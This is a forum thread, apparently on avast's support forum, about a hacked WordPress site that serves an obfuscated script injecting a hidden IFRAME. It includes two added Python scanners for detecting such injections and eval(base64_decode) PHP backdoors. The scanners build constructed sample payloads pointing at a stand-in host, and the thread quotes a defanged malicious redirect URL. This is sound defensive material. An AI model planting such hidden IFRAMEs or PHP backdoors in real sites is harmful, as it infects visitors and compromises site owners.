Avast blocking MY website

How can I disable avast on my website? It was working fine on Saturday, but now when I try to access it, it comes up with "Trojan Horse found". How the hell can this be right? I am not happy at all with Avast at the moment.
hxxp://www.charmouth-dorset.co.uk

Hi clothahump, welcome to the forum :slight_smile:

Could you please modify your link to make it unclickable (i.e. change http to hXXp) to prevent others potentially becoming infected.

This kind of detection is very common these days, with many ‘legitimate sites’ becoming hacked to distribute malware:

Every 3.6 seconds a website is infected

Unfortunately, it would appear that your site has been hacked, there is an obfuscated script in the middle of the page, which is causing avast! to alert…

As you can see, avast isn’t alone in this detection: http://www.virustotal.com/analisis/6fa245bab1859aaf37e4be0b753db4a41f465c05236ef1c081d0c333693a67d3-1265654235


A post worth reading by DavidR

It is wordpress based and the last date the main page was changed is “Last edited by admin on 21/12/2009 at 15:25”

The village of Charmouth lies on the West Dorset coast of England nestling between the Towns of Bridport and Lyme Regis, there is a very relaxed feeling to the village which is ever popular with tourists from around the World.

[caption id="attachment_19" align="aligncenter" width="400" caption="Charmouth from the West"]<img class="size-full wp-image-19" title="charmouth" src="http://www.charmouth-dorset.co.uk/wp-content/uploads/2009/04/charmouth.jpg" alt="Charmouth from the West" width="400" height="221" />[/caption]

Nothing there remotely like a Trojan.

It is a few hundred lines above that, line 804 to be precise, as you can see from the image.

Search for “head><script” and you will find it, as that is the only occurrence of that particular code.

This can also be used as a reference point to find the script:
http://www.unmaskparasites.com/security-report/?page=www.charmouth-dorset.co.uk

Search for df( and you’ll find it pretty quickly. Here’s a screenshot for you: https://dl.dropbox.com/u/3640070/charmouth-dorset.PNG
Incidentally, that obfuscated JS creates a hidden IFRAME that leads to hxxp://itsallbreaksoft.net/tds/in.cgi?3&seoref=undefined&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=undefined&default_keyword=notdefine; I’ll go check that out.
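The posts above describe the injected script by hand: a `<script>` placed right after `<head>`, obfuscated, and decoding to a hidden IFRAME pointing at a TDS URL. The following is an added example (not code from the thread or from avast) of how to scan a saved copy of a page for that pattern. The sample page, the hex-packing `df()` routine and the `example.invalid` URL are constructed for the demonstration; the real script's encoding is not shown in the thread, so the decoder only handles long hex runs and treats `String.fromCharCode`-style packers as out of scope.

```python
"""Scan saved HTML for an injected <script> that writes a hidden IFRAME.

Added example; the infected page below is constructed, not the real
charmouth-dorset.co.uk source, and the hex-packing "df" routine is an
assumption about how such a script might be obfuscated.
"""
import re

# Constructed payload. example.invalid is a reserved name and never resolves.
_IFRAME = ('<iframe src="http://example.invalid/tds/in.cgi" '
           'width=0 height=0 style="visibility:hidden"></iframe>')
_HEX = _IFRAME.encode().hex()

# Constructed sample: the injection sits directly after <head>, packs its
# payload as hex and writes it out with document.write().
INFECTED_PAGE = (
    "<html><head><script>function df(s){var o='';for(var i=0;i<s.length;i+=2)"
    "o+=String.fromCharCode(parseInt(s.substr(i,2),16));return o;}"
    "document.write(df('" + _HEX + "'))</script>\n"
    "<title>Charmouth</title></head>\n<body>\n"
    "<p>The village of Charmouth lies on the West Dorset coast.</p>\n"
    "</body></html>"
)
CLEAN_PAGE = ("<html><head>\n<title>Charmouth</title></head>\n<body>\n"
              "<p>The village of Charmouth.</p>\n</body></html>")

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
HEX_RE = re.compile(r"(?:[0-9a-fA-F]{2}){20,}")        # 40+ hex chars in a row
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
SRC_RE = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.I)
HIDDEN_MARKERS = (                                       # ways to hide a frame
    re.compile(r"""\b(?:width|height)\s*=\s*["']?0\b""", re.I),
    re.compile(r"visibility\s*:\s*hidden", re.I),
    re.compile(r"display\s*:\s*none", re.I),
)


def decode_hex_blobs(script):
    """Decode every long hex run in a script body; non-ASCII results are dropped."""
    out = []
    for m in HEX_RE.finditer(script):
        try:
            out.append(bytes.fromhex(m.group(0)).decode("ascii"))
        except (ValueError, UnicodeDecodeError):
            continue
    return out


def hidden_iframes(text):
    """Return the src of every IFRAME whose attributes try to make it invisible."""
    srcs = []
    for m in IFRAME_RE.finditer(text):
        attrs = m.group(1)
        if any(h.search(attrs) for h in HIDDEN_MARKERS):
            s = SRC_RE.search(attrs)
            srcs.append(s.group(1) if s else "")
    return srcs


def scan(html):
    """Report each <script> that (raw or after hex decoding) emits a hidden IFRAME."""
    findings = []
    for m in SCRIPT_RE.finditer(html):
        body = m.group(1)
        line = html.count("\n", 0, m.start()) + 1            # 1-based line of the tag
        after_head = bool(re.search(r"<head\b[^>]*>\s*$", html[:m.start()], re.I))
        decoded = decode_hex_blobs(body)
        for src in hidden_iframes(body + "\n" + "\n".join(decoded)):
            findings.append({"line": line, "after_head": after_head,
                             "src": src, "obfuscated": bool(decoded)})
    return findings


if __name__ == "__main__":
    for f in scan(INFECTED_PAGE):
        print(f)
```

Run it against a page fetched with `curl -s`, never with a browser, and grep the finding's `src` host against the URL avast reported; the `line` field corresponds to the "line 804" that DavidR located by hand.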

Found it and removed it, changed passwords on server and WordPress. The file was edited at 1:12am on the 2nd of February; I was in bed, so not me. Will be chasing server tech now and start kicking ass.

Thanks Guys. :wink:

Start by reading the Quoted text Scott posted as this is likely to be an old vulnerable version of WordPress that is being used.

So before you start kicking a**es ensure that it isn’t your own you will be kicking, e.g. who is responsible for the maintenance of wordpress and or any other content management software on your site ;D

Wordpress is bang up to date, attack was server side.

OK polish your boots so they don’t get stuck ;D

Quite often we’re seeing iframes and other malscripts injected as a result of a virus on a PC with FTP access to the infected website.

The virus works by stealing the FTP login credentials from the PC, especially if the PC is using FileZilla, which stores all FTP credentials in a plain text file. The virus sends the FTP credentials to a server which then infects whatever websites it has access to.

The virus also works as a keylogger and as a sniffer. FTP transmits all data, including username and password in plain text. Quite easy for the virus to “see” the username, password and FTP address, steal it and send it to “their” server.

So, just cleaning the file and updating the CMS software, etc. won’t necessarily keep the website clean. Changing FTP passwords won’t either because the virus will just steal it again. We’ve seen this over and over again.

You have to get rid of FileZilla, if that’s what you’re using (Unmaskparasites has a great article on this issue: http://blog.unmaskparasites.com/2009/09/23/10-ftp-clients-malware-steals-credentials-from/), and use FTP software that encrypts the stored usernames and passwords. In this instance, even changing from FTP to SFTP or FTPS won’t help, as quite often the hacker’s server is logging in using valid credentials stolen from the plain text file on the PC.

The hackers also like to install backdoors so when you clean and remove the virus that steals FTP passwords, the hackers can still infect the website.

Oftentimes we’ve seen code that contains eval(base64_decode in .php files. It’s usually found at the top or the very bottom of the .php file. Often this code is used to remotely inject malscripts into websites. Other times we’re seeing a variety of Perl files used to reinfect websites.

Just thought you’d like to know…
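The post above says the backdoor usually shows up as `eval(base64_decode(...))` at the very top or bottom of a .php file and is used to push malscripts into the site. The following is an added example (not code from the thread or from WeWatchYourWebs) of a scanner that walks a web root, finds that construct, reports whether it sits at the top, bottom or middle of the file, and decodes the payload so you can see what it would have injected. It goes slightly beyond the post by also unwrapping the `gzinflate`, `gzuncompress` and `str_rot13` wrappers that commonly surround `base64_decode`. The sample web root, the file names and the IFRAME payload are constructed for the demonstration.

```python
"""Find eval(base64_decode(...)) backdoors in PHP files and decode their payloads.

Added example, not the poster's tooling. The sample web root is constructed in a
temporary directory; the payload it decodes is a constructed hidden-IFRAME echo.
"""
import base64
import codecs
import os
import re
import tempfile
import zlib

# eval( [wrapper(] base64_decode( '...' )  -- wrapper is optional
EVAL_B64_RE = re.compile(
    r"eval\s*\(\s*(?:(gzinflate|gzuncompress|str_rot13)\s*\(\s*)?"
    r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]",
    re.I,
)


def decode_payload(wrapper, b64):
    """Reverse base64 plus the optional PHP wrapper; return None on garbage."""
    try:
        raw = base64.b64decode(b64, validate=True)
        if wrapper == "gzinflate":            # PHP gzinflate == raw DEFLATE
            raw = zlib.decompress(raw, -15)
        elif wrapper == "gzuncompress":       # PHP gzuncompress == zlib stream
            raw = zlib.decompress(raw)
        text = raw.decode("utf-8", "replace")
        if wrapper == "str_rot13":
            text = codecs.decode(text, "rot13")
        return text
    except (ValueError, zlib.error):
        return None


def find_eval_b64(src):
    """Return one dict per eval(base64_decode) hit with its line and file position."""
    total = len(src.splitlines())
    hits = []
    for m in EVAL_B64_RE.finditer(src):
        line = src.count("\n", 0, m.start()) + 1
        if line <= 3:
            position = "top"
        elif line >= total - 2:
            position = "bottom"
        else:
            position = "middle"
        wrapper = m.group(1).lower() if m.group(1) else None
        hits.append({"line": line, "position": position, "wrapper": wrapper,
                     "decoded": decode_payload(wrapper, m.group(2))})
    return hits


def scan_tree(root):
    """Walk a web root and collect hits from every .php file."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                src = fh.read()
            for h in find_eval_b64(src):
                h["file"] = os.path.relpath(path, root)
                hits.append(h)
    return hits


def build_sample_root():
    """Constructed web root: one clean file, one top injection, one gzinflate bottom injection."""
    root = tempfile.mkdtemp(prefix="webroot-")
    payload = ("echo '<iframe src=\"http://example.invalid/tds/in.cgi\" "
               "width=0 height=0></iframe>';")
    b64 = base64.b64encode(payload.encode()).decode()
    comp = zlib.compressobj(wbits=-15)                    # raw DEFLATE, as gzinflate expects
    gz = base64.b64encode(comp.compress(payload.encode()) + comp.flush()).decode()
    files = {
        "index.php": "<?php\n// hypothetical clean front controller\necho 'ok';\n",
        "wp-config.php": ("<?php eval(base64_decode('" + b64 + "')); ?>\n<?php\n"
                          "/** hypothetical config */\ndefine('DB_NAME', 'wp');\n"),
        "footer.php": ("<?php\n/* hypothetical theme footer */\necho '</body></html>';\n?>\n"
                       "<?php eval(gzinflate(base64_decode('" + gz + "'))); ?>\n"),
    }
    for name, body in files.items():
        with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for hit in scan_tree(build_sample_root()):
        print(hit["file"], hit["position"], hit["wrapper"], hit["decoded"])
```

Point `scan_tree` at a copy of the site taken over SFTP rather than at the live root, and compare the decoded text with what avast flagged in the HTML; a payload that echoes a hidden IFRAME is the server-side source of the injection described earlier in the thread, and cleaning the HTML alone will not remove it.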


Thanks for posting the above information, WeWatchYourWebs :slight_smile: